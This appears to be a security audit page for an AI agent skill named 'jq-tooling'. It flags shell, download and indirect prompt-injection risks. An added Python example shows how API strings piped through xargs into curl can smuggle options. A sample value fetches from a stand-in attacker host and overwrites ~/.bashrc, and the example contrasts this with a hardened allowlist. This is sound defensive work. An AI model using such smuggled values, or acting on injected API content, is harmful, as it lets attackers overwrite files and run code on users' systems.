jq-tooling
Fail
Audited by Gen Agent Trust Hub on Mar 10, 2026
Risk Level: HIGH
Risk categories: COMMAND_EXECUTION, DATA_EXFILTRATION, EXTERNAL_DOWNLOADS, REMOTE_CODE_EXECUTION, PROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The skill provides numerous shell command examples and specifically includes instructions for system-level package installation using 'sudo apt-get install jq', which requires elevated privileges.
- [DATA_EXFILTRATION]: Documentation examples demonstrate reading from sensitive internal agent paths like '~/.agents/.skill-lock.json', potentially exposing private metadata about the agent's environment and installed skills.
- [EXTERNAL_DOWNLOADS]: The skill demonstrates fetching data from external APIs via 'curl', including endpoints at api.github.com and generic placeholders.
- [REMOTE_CODE_EXECUTION]: An example demonstrates piping data from jq into 'xargs curl -O', allowing the agent to programmatically download arbitrary files from the internet based on processed content.
- [PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection.
  1. Ingestion points: data from external APIs (SKILL.md).
  2. Boundary markers: absent.
  3. Capability inventory: subprocess execution via bash and network operations via curl (SKILL.md).
  4. Sanitization: absent; the skill demonstrates direct interpolation of external data into shell commands.
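The following is an added example written for this audit page; it is not code from the jq-tooling skill or from Gen Agent Trust Hub. It models the REMOTE_CODE_EXECUTION and PROMPT_INJECTION findings above in Python (the language an agent runtime would typically call tools from) and contrasts them with a hardened form. The input is a constructed JSON document in the shape of a GitHub release object; the jq path `.assets[].browser_download_url`, the host allowlist and all filenames are assumptions. The key mechanism it shows: `xargs` re-tokenises jq's output on whitespace and quotes, so an attacker-controlled string in an API response can become extra `curl` options (here `-o /home/agent/.bashrc`), and `curl -O` names the local file after the remote path, so a URL ending in `/.bashrc` writes a dotfile into the working directory. `shlex.split` is used as a close approximation of the xargs tokeniser.

```python
import json
import posixpath
import re
import shlex
from urllib.parse import urlsplit

# Constructed sample in the shape of a GitHub release object (assumption: the
# skill reads '.assets[].browser_download_url'). Assets 2-4 carry attacker-
# controlled values that a real API response could contain in a string field.
SAMPLE_RESPONSE = json.dumps({
    "assets": [
        {"browser_download_url": "https://github.com/example/tool/releases/download/v1.0/tool.tar.gz"},
        {"browser_download_url": "-o /home/agent/.bashrc https://evil.example/payload"},
        {"browser_download_url": "https://github.com/example/tool/releases/download/v1.0/.bashrc"},
        {"browser_download_url": "http://github.com/example/tool/releases/download/v1.0/tool.tar.gz"},
    ]
})

# Hosts the agent is allowed to fetch from (assumption for the example).
ALLOWED_HOSTS = {"github.com"}
# A plain filename: no leading dot, no path separators, no shell-sensitive chars.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]*")


def extract_urls(raw):
    """Python equivalent of: jq -r '.assets[].browser_download_url'"""
    return [asset["browser_download_url"] for asset in json.loads(raw)["assets"]]


def unsafe_xargs_argv(raw):
    """Model the audited pattern `... | xargs curl -O`.

    xargs splits its input on whitespace and honours quotes/backslashes, so one
    attacker string becomes several curl arguments. shlex.split approximates
    that tokeniser. Returns the argv curl would actually receive."""
    argv = ["curl", "-O"]
    for value in extract_urls(raw):
        argv.extend(shlex.split(value))
    return argv


def validate_url(value):
    """Accept only a single https URL to an allowed host with a safe filename.
    Returns (url, local_name); raises ValueError with a reason otherwise."""
    if any(ch.isspace() or ord(ch) < 0x20 for ch in value):
        raise ValueError("whitespace or control character in value")
    parts = urlsplit(value)
    if parts.scheme != "https":
        raise ValueError(f"scheme {parts.scheme!r} is not https")
    if parts.username is not None or parts.password is not None:
        raise ValueError("userinfo in URL")
    if parts.hostname not in ALLOWED_HOSTS:
        raise ValueError(f"host {parts.hostname!r} not in allowlist")
    name = posixpath.basename(parts.path)
    # curl -O names the file after the last path segment; refuse dotfiles and
    # anything that is not a plain filename so a download cannot land on
    # e.g. ~/.bashrc.
    if not SAFE_NAME.fullmatch(name):
        raise ValueError(f"unsafe output name {name!r}")
    return value, name


def hardened_download_plan(raw):
    """One argv per accepted URL, built as a list (no shell, no xargs).
    '--' ends option parsing so the URL can never be read as an option, and
    '--output' pins the local filename to the validated one.
    Returns (argvs, rejected) where rejected is [(value, reason), ...]."""
    argvs, rejected = [], []
    for value in extract_urls(raw):
        try:
            url, name = validate_url(value)
        except ValueError as exc:
            rejected.append((value, str(exc)))
            continue
        # No -L: a redirect cannot pull from a host outside the allowlist.
        argvs.append(["curl", "--fail", "--output", name, "--", url])
    return argvs, rejected


if __name__ == "__main__":
    print("xargs-style argv:", unsafe_xargs_argv(SAMPLE_RESPONSE))
    plan, dropped = hardened_download_plan(SAMPLE_RESPONSE)
    for argv in plan:
        print("would run:", argv)  # subprocess.run(argv, check=True) in real use
    for value, reason in dropped:
        print("rejected:", repr(value), "-", reason)
```

Run it directly to see the two outcomes side by side: the xargs model hands curl the injected `-o /home/agent/.bashrc` option, while the hardened plan accepts only the first asset and reports why the other three were dropped. In a real skill the accepted argv would be passed to `subprocess.run` without `shell=True`; if `-L` is required (GitHub release assets are served via a redirect), the allowlist must also cover the redirect target hosts, otherwise the host check is bypassed by the first hop.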
Recommendations
- AI detected serious security threats
Audit Metadata